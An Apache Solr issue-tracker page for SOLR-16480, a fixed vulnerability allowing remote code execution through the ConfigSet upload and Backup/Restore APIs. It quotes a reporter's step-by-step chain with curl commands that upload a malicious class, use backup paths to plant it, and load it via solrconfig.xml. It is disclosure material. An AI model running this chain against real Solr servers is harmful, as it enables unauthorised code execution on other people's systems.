Uploaded image for project: 'Solr'
  1. Solr
  2. SOLR-16480

RCE via Backup/Restore APIs that allow for deployment of executables in malicious ConfigSets

    XMLWordPrintableJSON

Details

    • Bug
    • Status: Closed
    • Blocker
    • Resolution: Fixed
    • None
    • 9.1.1
    • Backup/Restore, configset-api
    • None

    Description

      Copying from the reporter's email:

      In CVE-2020-13957, an attacker can rce through SSTI,Then Solr removes the Template module.
      In the Cloud mode of Solr 9.0.0, You can still upload custom configuration files, Then I found a new way to RCE.

      Step 1.
      Prepare the default configuration file for solr9.0.0.

      Step 2.
      Compile the malicious class file(The package name of the class is zk_backup_0.configs.pocConf), put it into the configuration directory, package and upload it.

      zip -q -r poc.zip *
      curl -X POST --header "Content-Type:application/octet-stream" --data-binary @poc.zip "http://${target}/solr/admin/configs?action=UPLOAD&name=pocConf"

      Step 3.
      Use the pocConf configuration created in the previous step to create a new collection named pocCollection.
      curl "http://${target}/solr/admin/collections?action=CREATE&name=pocCollection&numShards=1&replicationFactor=1&wt=json&collection.configName=pocConf"

      Step 4.
      Through the backup api, you can export the configuration and bring out the class file.
      curl "http://${target}/solr/admin/collections?action=BACKUP&collection=pocCollection&location=${solrhome}/&name=expCollection_shard1_replica_n1"
      curl "http://${target}/solr/admin/collections?action=BACKUP&collection=pocCollection&location=${solrhome}/expCollection_shard1_replica_n1&name=lib"
      The final class file path is: ${solrhome}/expCollection_shard1_replica_n1/lib/pocCollection/zk_backup_0/configs/pocConf/Exp.class .

      Step 5.
      Modify solrconfig.xml to load the custom class, package and upload it, and use it to create a configuration named expConf.
      curl -X POST --header "Content-Type:application/octet-stream" --data-binary @exp.zip "http://${target}/solr/admin/configs?action=UPLOAD&name=expConf"

      Step 6.
      Use the expConf configuration created in the previous step to create a new collection named expCollection.
      The creation process will load some custom classes configured in solrconfig.xml, thereby triggering Java code execution.

      Step 7.
      Ordinary java code is restricted by Java sandbox, But I found a way to bypass the Java sandbox, The details are in the attachment.

      The following is a proof screenshots, I put the attack script in the attachment.
      1. Startup the environment
      docker run --rm -td --name solr9.0.0 -p 8983:8983 solr:9.0.0 bash
      docker exec -ti solr9.0.0 bash
      solr start -c

      2. Run the exp

      Attachments

        1. SOLR-16480-1.patch
          29 kB
          Houston Putman
        2. SOLR-16480.patch
          22 kB
          Houston Putman

        Issue Links

          is superceded by

          Bug - A problem which impairs or prevents the functions of the product. SOLR-16949 RCE via Backup/Restore APIs - Fix for all file extensions

          • Blocker - Blocks development and/or testing work, production could not run
          • Closed

          Activity

            People

              houston Houston Putman
              houston Houston Putman
              Votes:
              0 Vote for this issue
              Watchers:
              6 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: